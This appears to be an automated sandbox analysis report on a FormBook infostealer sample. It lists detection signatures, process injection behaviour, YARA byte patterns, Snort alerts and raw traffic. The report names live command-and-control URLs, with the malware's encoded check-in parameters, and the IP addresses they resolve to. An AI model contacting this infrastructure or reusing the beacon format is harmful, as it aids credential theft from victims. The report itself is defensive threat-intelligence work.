Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WrrCV4QR2J.exe

Overview

General Information

Sample name:WrrCV4QR2J.exe
renamed because original name is a hash value
Original sample name:dc9c5d5251164a289cac05382c699c11fb51463f88fea60746dd571e1feeb5fc.exe
Analysis ID:1356273
MD5:26c7731786626894ce4fcc339951a26b
SHA1:5103ffe527e144a275696454b45b1bda26c152bd
SHA256:dc9c5d5251164a289cac05382c699c11fb51463f88fea60746dd571e1feeb5fc
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WrrCV4QR2J.exe (PID: 4480 cmdline: C:\Users\user\Desktop\WrrCV4QR2J.exe MD5: 26C7731786626894CE4FCC339951A26B)
    • WrrCV4QR2J.exe (PID: 7240 cmdline: C:\Users\user\Desktop\WrrCV4QR2J.exe MD5: 26C7731786626894CE4FCC339951A26B)
      • UHPrrMeffyCaz.exe (PID: 2364 cmdline: "C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 7348 cmdline: C:\Windows\SysWOW64\isoburn.exe MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • UHPrrMeffyCaz.exe (PID: 5016 cmdline: "C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7728 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2fcf4:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1bed3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.WrrCV4QR2J.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.WrrCV4QR2J.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2aef3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x170d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.WrrCV4QR2J.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.WrrCV4QR2J.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2a0f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x162d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.474.208.236.18149743802855465 12/08/23-14:50:42.900472
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.466.29.155.5449764802855465 12/08/23-14:51:57.012130
            SID:2855465
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.485.159.66.9349776802855465 12/08/23-14:52:40.619764
            SID:2855465
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.452.220.48.16149796802855465 12/08/23-14:53:57.335622
            SID:2855465
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.437.97.254.2749792802855465 12/08/23-14:53:40.611998
            SID:2855465
            Source Port:49792
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4162.222.226.7749739802855465 12/08/23-14:50:19.134288
            SID:2855465
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4104.21.18.25349748802855465 12/08/23-14:50:56.404687
            SID:2855465
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4107.178.250.17749788802855465 12/08/23-14:53:26.280190
            SID:2855465
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4162.241.252.16149780802855465 12/08/23-14:52:55.335271
            SID:2855465
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.437.140.192.8949752802855465 12/08/23-14:51:11.265685
            SID:2855465
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.434.117.26.5749768802855465 12/08/23-14:52:11.624074
            SID:2855465
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4131.153.147.9049756802855465 12/08/23-14:51:27.263886
            SID:2855465
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.481.169.145.7049772802855465 12/08/23-14:52:25.956590
            SID:2855465
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.494.23.162.16349760802855465 12/08/23-14:51:42.204368
            SID:2855465
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4185.74.252.1149784802855465 12/08/23-14:53:10.644355
            SID:2855465
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: WrrCV4QR2J.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.77moea.top/ahec/?XveXHZvx=W415zxONlMY0LROHEGAnVDwgVvy34PrUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7al4cCYp0GZGyu2aw==&l4xX=rDStpH0HeAvira URL Cloud: Label: phishing
            Source: http://www.nesmalt.info/ahec/?XveXHZvx=DTrGbTEHMG6Y4mK16jmiKUG3Xw8oKDF5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRrX+Dyau3GNz4OAA==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.instantconvey.com/ahec/?XveXHZvx=SEtDmKR01RO/v1ckzNpTcUhCl/PMZGqFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7YIFIq1ILz0nKZVg==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.fam-scharf.net/ahec/?XveXHZvx=pHT1kOem2IT0Y9TJ94VCHNnbNLZhsvH3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhQP0JKKbiUNKMEcA==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.fam-scharf.net/ahec/Avira URL Cloud: Label: malware
            Source: http://www.poria.link/ahec/Avira URL Cloud: Label: malware
            Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpAvira URL Cloud: Label: malware
            Source: http://www.domainappraisalbot.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.altralogos.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.611erhm.top/ahec/Avira URL Cloud: Label: phishing
            Source: http://www.thecoloringbitch.com/ahec/?XveXHZvx=nB1qtJANgieev8TKH3dNfv3ofOkziUaCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMTKbCYScmVHGO9lg==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.user4deepriver.com/ahec/?XveXHZvx=9k2v98v8fW7x5mt2TD9N5hM0Gp49wMZ6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0pnZhULhTE/SFE2Bw==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.domainappraisalbot.com/ahec/?XveXHZvx=bB5JTYLqXbmN0Rh52tJaPPP1nCuGRYxCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYc20p8FNjdU2pWhmA==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.wrautomotive.online/ahec/?XveXHZvx=5igDJT3zPYxoznSfOhoK1Ng2m3hD5JqRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+25ITAAVo7msZgdw==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKpO/fBLfK4Y05FeQ==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.nesmalt.info/ahec/Avira URL Cloud: Label: malware
            Source: http://www.77moea.top/ahec/Avira URL Cloud: Label: phishing
            Source: http://www.thecoloringbitch.com/ahec/Avira URL Cloud: Label: malware
            Source: http://www.makeinai.online/ahec/Avira URL Cloud: Label: malware
            Source: http://altralogos.com/ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4ZAvira URL Cloud: Label: malware
            Source: http://www.makeinai.online/ahec/?XveXHZvx=MydpLo7WWyKQN3KVLs+v6WaBMDmZ37UnbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOkoUWHW96MRNJ3hQ==&l4xX=rDStpH0HeAvira URL Cloud: Label: malware
            Source: http://www.wrautomotive.online/ahec/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: WrrCV4QR2J.exeReversingLabs: Detection: 73%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: WrrCV4QR2J.exeJoe Sandbox ML: detected
            Source: WrrCV4QR2J.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: WrrCV4QR2J.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdb source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120809437.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120809437.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UHPrrMeffyCaz.exe, 00000003.00000002.4120453242.00000000000AE000.00000002.00000001.01000000.0000000C.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1845745734.00000000000AE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: WrrCV4QR2J.exe, 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1791775384.00000000045F1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1793504608.00000000047AB000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004960000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: WrrCV4QR2J.exe, WrrCV4QR2J.exe, 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000004.00000003.1791775384.00000000045F1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1793504608.00000000047AB000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004960000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028EC280 FindFirstFileW,FindNextFileW,FindClose,4_2_028EC280
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then pop edi4_2_028E1A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax4_2_028D99C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then pop edi4_2_028DE2BF

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49739 -> 162.222.226.77:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 74.208.236.181:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 104.21.18.253:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 37.140.192.89:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49756 -> 131.153.147.90:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 94.23.162.163:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 66.29.155.54:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49768 -> 34.117.26.57:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49772 -> 81.169.145.70:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49776 -> 85.159.66.93:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 162.241.252.161:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49784 -> 185.74.252.11:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49788 -> 107.178.250.177:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49792 -> 37.97.254.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49796 -> 52.220.48.161:80
            Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
            Source: Joe Sandbox ViewASN Name: SS-ASHUS SS-ASHUS
            Source: Joe Sandbox ViewASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL TRANSIP-ASAmsterdamtheNetherlandsNL
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:50:48 GMTContent-Length: 353Connection: closeContent-Encoding: gzipX-Frame-Options: SAMEORIGINCache-Control: private, no-cache, no-store, max-age=0Expires: Mon, 01 Jan 1990 0:00:00 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eMEaukHhjCSQTUs92yM8CbjGawTCEIkCp0dPRmAgW2QYf9LHBUsUfl7Zui%2Bb7mZS6FkShsiwZ0FMTgfbbC8m808x%2BPFvDJ%2BxAHOB27060BLi0PxGOxzKMOB8ZYHYBKdKHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 83257ac11fa79aeb-MIAalt-svc: h3=":443"; ma=86400Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 52 b1 4e c4 30 0c fd 15 6f b7 a0 e6 90 98 50 af 23 12 0b 0b 13 a3 db b8 6d 44 1a 17 c7 bd aa 7f 8f d3 d3 1d 27 40 6a 2a bd 17 fb 3d c7 76 3d ea 14 9b 7a 24 f4 4d ad 41 23 35 6f ac f0 c2 4b f2 b5 bb 10 b5 bb 5c b7 ec b7 a6 ee 28 29 89 a1 ff 8e 7d 61 b8 57 28 d0 fe 3f 21 8a 6d 24 e8 28 c6 19 bd 0f 69 38 3d 1e 77 98 67 ec 0a 3c c2 1a bc 8e a7 a7 e3 11 5a 16 4f 72 7a b4 b4 92 ea 9b 0f 5e 04 3c 4f 18 12 74 bc 44 0f c9 bc 5a 82 be d8 81 b1 25 a0 67 59 51 8a 38 b0 40 56 c2 a8 e3 3d bb 17 91 2b b8 56 f5 da c3 c6 0b 08 95 c7 c5 0d 32 69 21 04 12 4e 64 48 ce 24 f9 01 e6 48 98 09 56 0c 0a 08 3d ad 30 85 b4 28 65 40 33 57 d9 00 07 ab ac 82 77 9e 48 c3 64 17 42 59 51 b4 98 ee 82 ad f0 6a 7a 30 52 9c 73 f5 c7 ff 6b 09 62 8f 59 44 47 0b c2 9c 83 a5 a7 8e 6e de e7 90 cd bc 28 ed 3d 30 40 80 0a 35 c2 28 d4 9f 0e a3 ea fc ec dc ba ae 95 df 12 7a d6 aa e3 e9 d0 fc 22 6a 87 4d 65 f3 b5 a9 ba d2 5a b7 77 e4 67 4a 61 1a 20 4b 77 d3 9b 51 3e bb c8 8b bf 17 71 91 07 ae 86 d0 1f 4c e0 ba 16 ee b2 25 6e df ab 6f b5 21 96 59 5e 02 00 00 Data Ascii: mRN0oP#mD'@j*=v=z$MA#5oK\()}aW(?!m$(i8=wg<ZOrz^<OtDZ%gYQ8@V=+V2i!NdH$HV=0(e@3WwHdBYQjz0RskbYDGn(=0@5(z"jMeZwgJa KwQ>qL%no!Y^
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:50:51 GMTContent-Length: 353Connection: closeContent-Encoding: gzipX-Frame-Options: SAMEORIGINCache-Control: private, no-cache, no-store, max-age=0Expires: Mon, 01 Jan 1990 0:00:00 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mStufdvmE9kAgPDd2Z0xr44JqzWQf0WqGwjgkT%2FxaItiwU9PhR4%2Bwxo3VRLk2WtuE1Evb%2BcXdYiDphX3lFuOBBcE8gHRWEeOfZNT5X3McUp4tJ472R8toMypEB%2BK%2B11YXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 83257ad1ae1667cf-MIAalt-svc: h3=":443"; ma=86400Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 52 b1 4e c4 30 0c fd 15 6f b7 a0 e6 90 98 50 af 23 12 0b 0b 13 a3 db b8 6d 44 1a 17 c7 bd aa 7f 8f d3 d3 1d 27 40 6a 2a bd 17 fb 3d c7 76 3d ea 14 9b 7a 24 f4 4d ad 41 23 35 6f ac f0 c2 4b f2 b5 bb 10 b5 bb 5c b7 ec b7 a6 ee 28 29 89 a1 ff 8e 7d 61 b8 57 28 d0 fe 3f 21 8a 6d 24 e8 28 c6 19 bd 0f 69 38 3d 1e 77 98 67 ec 0a 3c c2 1a bc 8e a7 a7 e3 11 5a 16 4f 72 7a b4 b4 92 ea 9b 0f 5e 04 3c 4f 18 12 74 bc 44 0f c9 bc 5a 82 be d8 81 b1 25 a0 67 59 51 8a 38 b0 40 56 c2 a8 e3 3d bb 17 91 2b b8 56 f5 da c3 c6 0b 08 95 c7 c5 0d 32 69 21 04 12 4e 64 48 ce 24 f9 01 e6 48 98 09 56 0c 0a 08 3d ad 30 85 b4 28 65 40 33 57 d9 00 07 ab ac 82 77 9e 48 c3 64 17 42 59 51 b4 98 ee 82 ad f0 6a 7a 30 52 9c 73 f5 c7 ff 6b 09 62 8f 59 44 47 0b c2 9c 83 a5 a7 8e 6e de e7 90 cd bc 28 ed 3d 30 40 80 0a 35 c2 28 d4 9f 0e a3 ea fc ec dc ba ae 95 df 12 7a d6 aa e3 e9 d0 fc 22 6a 87 4d 65 f3 b5 a9 ba d2 5a b7 77 e4 67 4a 61 1a 20 4b 77 d3 9b 51 3e bb c8 8b bf 17 71 91 07 ae 86 d0 1f 4c e0 ba 16 ee b2 25 6e df ab 6f b5 21 96 59 5e 02 00 00 Data Ascii: mRN0oP#mD'@j*=v=z$MA#5oK\()}aW(?!m$(i8=wg<ZOrz^<OtDZ%gYQ8@V=+V2i!NdH$HV=0(e@3WwHdBYQjz0RskbYDGn(=0@5(z"jMeZwgJa KwQ>qL%no!Y^
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:50:53 GMTContent-Length: 353Connection: closeContent-Encoding: gzipX-Frame-Options: SAMEORIGINCache-Control: private, no-cache, no-store, max-age=0Expires: Mon, 01 Jan 1990 0:00:00 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5gkaYz%2F18GeIyn8dhQOH4sA2NQuuc%2F2FVZDrbX2Vrhp0oa5zSiDrLHxV2loRl78yGjEV09DGsWs29kLm7plQZbpOZ8GKp%2BjJtuKkcP4S6kAINFucOfLa0mp27W3%2BpNY7oA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 83257ae23957495e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 52 b1 4e c4 30 0c fd 15 6f b7 a0 e6 90 98 50 af 23 12 0b 0b 13 a3 db b8 6d 44 1a 17 c7 bd aa 7f 8f d3 d3 1d 27 40 6a 2a bd 17 fb 3d c7 76 3d ea 14 9b 7a 24 f4 4d ad 41 23 35 6f ac f0 c2 4b f2 b5 bb 10 b5 bb 5c b7 ec b7 a6 ee 28 29 89 a1 ff 8e 7d 61 b8 57 28 d0 fe 3f 21 8a 6d 24 e8 28 c6 19 bd 0f 69 38 3d 1e 77 98 67 ec 0a 3c c2 1a bc 8e a7 a7 e3 11 5a 16 4f 72 7a b4 b4 92 ea 9b 0f 5e 04 3c 4f 18 12 74 bc 44 0f c9 bc 5a 82 be d8 81 b1 25 a0 67 59 51 8a 38 b0 40 56 c2 a8 e3 3d bb 17 91 2b b8 56 f5 da c3 c6 0b 08 95 c7 c5 0d 32 69 21 04 12 4e 64 48 ce 24 f9 01 e6 48 98 09 56 0c 0a 08 3d ad 30 85 b4 28 65 40 33 57 d9 00 07 ab ac 82 77 9e 48 c3 64 17 42 59 51 b4 98 ee 82 ad f0 6a 7a 30 52 9c 73 f5 c7 ff 6b 09 62 8f 59 44 47 0b c2 9c 83 a5 a7 8e 6e de e7 90 cd bc 28 ed 3d 30 40 80 0a 35 c2 28 d4 9f 0e a3 ea fc ec dc ba ae 95 df 12 7a d6 aa e3 e9 d0 fc 22 6a 87 4d 65 f3 b5 a9 ba d2 5a b7 77 e4 67 4a 61 1a 20 4b 77 d3 9b 51 3e bb c8 8b bf 17 71 91 07 ae 86 d0 1f 4c e0 ba 16 ee b2 25 6e df ab 6f b5 21 96 59 5e 02 00 00 Data Ascii: 